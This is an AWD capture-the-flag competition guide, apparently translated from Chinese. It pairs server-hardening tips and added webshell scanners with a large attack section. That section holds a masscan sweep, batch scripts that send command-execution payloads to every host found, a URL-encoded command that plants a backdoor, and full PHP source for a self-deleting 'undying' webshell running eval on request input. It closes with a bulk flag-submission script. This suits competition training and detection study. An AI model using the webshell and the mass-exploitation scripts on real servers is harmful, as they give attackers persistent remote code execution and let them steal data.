This was my first time taking part in an on-site AWD competition; my approach was too narrow and I was scrambling the whole time. Using the open-source AWD platform from other experts and the PHP environment used in the competition, I have put together a simple set of ideas.
GitHub address of the AWD platform: https://github.com/m0xiaoxi/AWD_CTF_Platform
Hardening ideas:
1. Log in to the server over SSH and change the password: passwd

2. Download and back up the source code (FileZilla, SFTP, "ask for password" logon type):

```bash
tar -czvf /tmp/html.tar.gz /var/www/html      # compress
cd /tmp
tar -xzvf /tmp/html.tar.gz                    # extract
cp -R /tmp/var/www/html/. /var/www/html/      # copy back
mysqldump -u root -p test > test.sql          # back up the database ("test" is the database name)
mysql -u root -p test < test.sql              # restore the database
```

3. Quick search commands:

- Deploy a WAF or request logging (if the WAF/log file itself sits under the web directory, the command below also inserts the include into that file, so delete the include from the WAF file):

```bash
find /var/www/html -name "*.php" | xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"
```

- Quick check for webshells:

```bash
find /var/www/html -name "*.php" | xargs egrep 'assert|eval|phpinfo\(\)|base64_decode\(|shell_exec|passthru|file_put_contents\(.*\$'
```

4. Webshell scanning (D盾 / D Shield): delete the trojan backdoors.

5. Code audit (Seay): hard-code the vulnerable variables, and so on.

6. Capture traffic:

```bash
tcpdump -t -s 0 -w /tmp/target.cap tcp and port 80
```

-t: do not print timestamps
-s 0: by default only the first 68 bytes of each packet are captured; with -s 0 the complete packet is captured
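As an added example (not code from the original post), the quick webshell check above written as a Python scanner: it applies the same dangerous-function patterns as the egrep one-liner, additionally flags hidden `.php` files and the markers of the "undying" webshell described later in the post (ignore_user_abort, set_time_limit(0), unlink(__FILE__)), and runs against a constructed sample web root written to a temporary directory. The sample file names (index.php, images/.config.php, upload.php) and their contents are assumptions made for this demonstration.

```python
import os
import re
import tempfile

# Detection rules: the post's egrep list plus the markers of the "undying" webshell.
RULES = [
    ("dangerous-call", re.compile(
        r"\b(assert|eval|phpinfo|shell_exec|passthru|system|exec|base64_decode)\s*\(")),
    ("write-from-variable", re.compile(r"file_put_contents\s*\(.*\$")),
    ("superglobal-into-eval", re.compile(
        r"\b(eval|assert|system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("undying-shell-marker", re.compile(
        r"ignore_user_abort\s*\(\s*true\s*\)|set_time_limit\s*\(\s*0\s*\)|unlink\s*\(\s*__FILE__\s*\)")),
]

def scan_file(path):
    """Return (rule, line number, line) hits for one PHP file; hidden file names count as a hit."""
    hits = []
    name = os.path.basename(path)
    if name.startswith("."):
        hits.append(("hidden-php-file", 0, name))
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, 1):
            for rule, pattern in RULES:
                if pattern.search(line):
                    hits.append((rule, lineno, line.rstrip("\n")))
    return hits

def scan_tree(root):
    """Walk the web root; return {relative path: sorted rule names} for every flagged .php file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".php"):
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root)] = sorted({h[0] for h in hits})
    return report

# Constructed sample web root (assumed file names; the two shell bodies follow the post's examples).
SAMPLES = {
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>\n",
    "images/.config.php": '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\n',
    "upload.php": (
        "<?php\n"
        "ignore_user_abort(true);\n"
        "set_time_limit(0);\n"
        "unlink(__FILE__);\n"
        "$file = '.config.php';\n"
        "$code = '<?php if(md5($_GET[\"passwd\"])==\"139bdb983ee92a3624f2cc978f0cb3b7\"){@eval($_REQUEST[cmd]);} ?>';\n"
        "while (1){\n"
        "    file_put_contents($file,$code);\n"
        "    usleep(5000);\n"
        "}\n"
        "?>\n"
    ),
}

def build_sample_root():
    """Write the constructed samples into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="awd_scan_")
    for rel, body in SAMPLES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
    return root

def demo():
    """Scan the sample root, print the findings and return the report."""
    report = scan_tree(build_sample_root())
    for rel in sorted(report):
        print(rel, "->", ", ".join(report[rel]))
    return report

if __name__ == "__main__":
    demo()
```

Point `scan_tree()` at the real web root (for example /var/www/html) instead of the sample directory. A hidden `.config.php` that keeps reappearing after deletion is being rewritten by a loop like the one in upload.php, so the "undying-shell-marker" hits are the files to look at in order to find and stop the writing process, not just the dropped file.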
Attack ideas:
1. Scan for attack targets:

```bash
sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml
```

2. Parse scan.xml into IP.txt:

```python
import re

# Dotted-quad IPv4 address.
ipaddr_re = r"((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)"
ip_re = r"addr=.*addrtype="
port_re = r"portid=.*><state"
portnum_re = r"[1-9]\d*"

def readxml(path):
    """Read the masscan XML output and return a list of [ip, port] pairs."""
    results = []
    with open(path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each element
            if "addr=" in line:
                ip = re.search(ip_re, line).group()
                ip = re.search(ipaddr_re, ip).group()
                port = re.search(port_re, line).group()
                port = re.search(portnum_re, port).group()
                results.append([ip, port])
    return results

def writetxt(results):
    """Write one ip:port per line to IP.txt (the file the batch script reads)."""
    with open("IP.txt", "w") as f:
        for i in results:
            ip_port = i[0] + ":" + i[1] + "\n"
            f.write(ip_port)

def main():
    results = readxml("scan.xml")
    writetxt(results)

if __name__ == '__main__':
    main()
```
3. Capture the payload with Burp and attack in bulk:

The Burp plugin "copy as python-requests" converts a Burp request into Python requests-library form. Example output:

```python
import requests

burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);"
burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
```

Batch access script; the responses are written to result.txt (because a connection to a planted undying webshell never closes, the next IP would never be reached, so a timeout should be added):
```python
import requests

def IP(IP_path):
    """Read one ip:port per line from IP.txt."""
    IP_list = []
    with open(IP_path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each element
            IP_list.append(line)
    return IP_list

def attack(IP_list):
    result_list = []

    '''The parameters below must be replaced to suit the actual situation'''
    burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian"
    burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
    burp0_headers = {"Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    burp0_data = {"cmd": "system(\"cat ../../../../flag\");"}

    # Swap the host:port part of the URL for each target in IP.txt.
    url = burp0_url.split("/")
    for ip in IP_list:
        url[2] = ip
        burp0_url = "/".join(url)
        print(burp0_url)
        try:
            '''The statement below must be replaced to suit the actual situation; adding a timeout is recommended'''
            r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)

            if r.status_code == 200:
                result_list.append(ip + "\n")
                result_list.append(r.text + "\n")
                print(r.text)
        except requests.exceptions.Timeout:
            continue
    return result_list

def write(result_list):
    with open("result.txt", "w") as f:
        for line in result_list:
            f.write(line)

def main():
    IP_list = IP("IP.txt")
    result_list = attack(IP_list)
    write(result_list)

if __name__ == '__main__':
    main()
```

4. Plant the undying webshell in bulk through the default backdoor:
Writing the undying webshell through command execution. When sent as a GET request the payload must be URL-encoded:
```
cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B
```

Plaintext:
```
system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');
```

5. Plant the undying webshell in bulk through an upload vulnerability. 不死马.php (the undying-webshell file):
```php
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.config.php';
$code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

// usage: .config.php?passwd=FPXtian&cmd=system("ls");
```

6. Fetch flags in bulk through the undying webshell: build the flag-fetching payload, generate the requests-library parameters with the copy as python-requests plugin, and substitute them into the batch access script to hit all targets.

7. Submit flags in bulk:
```python
import requests
import re

# flag_re = "flag(.*)"
flag_re = ".{32}"

def flag(flag_path):
    """Extract every 32-character flag from result.txt."""
    flag_list = []
    with open(flag_path, "r") as f:
        for line in f.readlines():
            line = line.strip('\n')  # strip the trailing newline from each element
            if re.search(flag_re, line):
                flag = re.search(flag_re, line).group()
                flag_list.append(flag)
    return flag_list

def submit(flag_list):
    for flag in flag_list:

        '''The parameters below must be replaced to suit the actual situation'''
        burp0_url = "http://192.168.0.103:9090"
        burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
        burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
                         "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded",
                         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
                         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                         "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate",
                         "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
        burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"}

        try:
            '''The statement below must be replaced to suit the actual situation; adding a timeout is recommended'''
            r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
            if r.status_code == 200:
                print(flag, r.text)
        except requests.exceptions.Timeout:
            continue

def main():
    flag_list = flag("result.txt")
    submit(flag_list)

if __name__ == '__main__':
    main()
```
Follow-up defense and attack ideas:
1. Analyze the traffic: fix the vulnerabilities, or directly turn other teams' attack traffic around and use it to counter-attack in bulk.

2. Kill the undying webshell:

```bash
while true
do
    rm -f .config.php
done
```
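As an added example (not code from the original post) for the "analyze the traffic" step: once the tcpdump capture (or the web server's access log) has been reduced to HTTP request lines, the script below triages them. It parses constructed Apache-style access-log lines (the IPs, timestamps, sizes and paths are made up for this demonstration), URL-decodes each request target, and flags requests that carry PHP function calls, shell loops, a hidden `.php` target, or the passwd/cmd parameters the post's webshell answers to; it then groups the hits by path so the endpoint to patch (or the backdoor file to remove) is obvious.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined log shape: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Patterns run over the URL-decoded request target (path + query).
RULES = [
    ("php-call", re.compile(r"\b(system|eval|assert|shell_exec|passthru|exec|base64_decode)\s*\(")),
    ("shell-loop", re.compile(r"\bwhile\s+true\b")),
]
# A hidden PHP file as the request path, e.g. /images/.config.php (the post's undying webshell).
HIDDEN_PHP_RE = re.compile(r"/\.[^/]*\.php$")
# Query parameter names the post's webshell responds to.
WEBSHELL_KEYS = {"cmd", "passwd"}

def parse_line(line):
    """Split one access-log line into fields; returns None when the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    rec["decoded"] = unquote(rec["target"])
    return rec

def triage(lines):
    """Return one finding per suspicious request: ip, method, path, decoded target, matched rules."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rules = {name for name, pat in RULES if pat.search(rec["decoded"])}
        if HIDDEN_PHP_RE.search(rec["path"]):
            rules.add("hidden-php")
        if WEBSHELL_KEYS & set(rec["params"]):
            rules.add("webshell-param")
        if rules:
            findings.append({
                "ip": rec["ip"],
                "method": rec["method"],
                "path": rec["path"],
                "decoded": rec["decoded"],
                "rules": sorted(rules),
            })
    return findings

def vulnerable_endpoints(findings):
    """Group flagged requests by path: the files to patch (or backdoors to remove) first."""
    by_path = {}
    for f in findings:
        by_path.setdefault(f["path"], set()).add(f["ip"])
    return {path: sorted(ips) for path, ips in by_path.items()}

# Constructed sample log lines (made up for this example, not real competition traffic).
SAMPLE_LOG = [
    '192.168.100.23 - - [10/Oct/2020:14:02:11 +0800] "GET /config.php?a=system(%22ls%22); HTTP/1.1" 200 512',
    '192.168.100.23 - - [10/Oct/2020:14:02:19 +0800] "GET /index.php?id=3 HTTP/1.1" 200 2048',
    '192.168.100.41 - - [10/Oct/2020:14:03:02 +0800] "GET /config.php?a=system(%27while%20true%3Bdo%20echo%20x%3E.config.php%3Bdone%3B%27)%3B HTTP/1.1" 200 0',
    '192.168.100.41 - - [10/Oct/2020:14:03:05 +0800] "POST /images/.config.php?passwd=FPXtian HTTP/1.1" 200 67',
    '192.168.100.7 - - [10/Oct/2020:14:03:40 +0800] "GET /static/logo.png HTTP/1.1" 200 9140',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["method"], f["decoded"], "->", ", ".join(f["rules"]))
    for path, ips in vulnerable_endpoints(found).items():
        print("patch", path, "(hit from " + ", ".join(ips) + ")")
```

On the sample, /config.php is flagged from two source IPs with a command-execution payload in the `a` parameter, which is the parameter to hard-code or validate first; the hidden /images/.config.php only receives requests with the webshell's parameter names, so it is a dropped backdoor rather than a vulnerable original file.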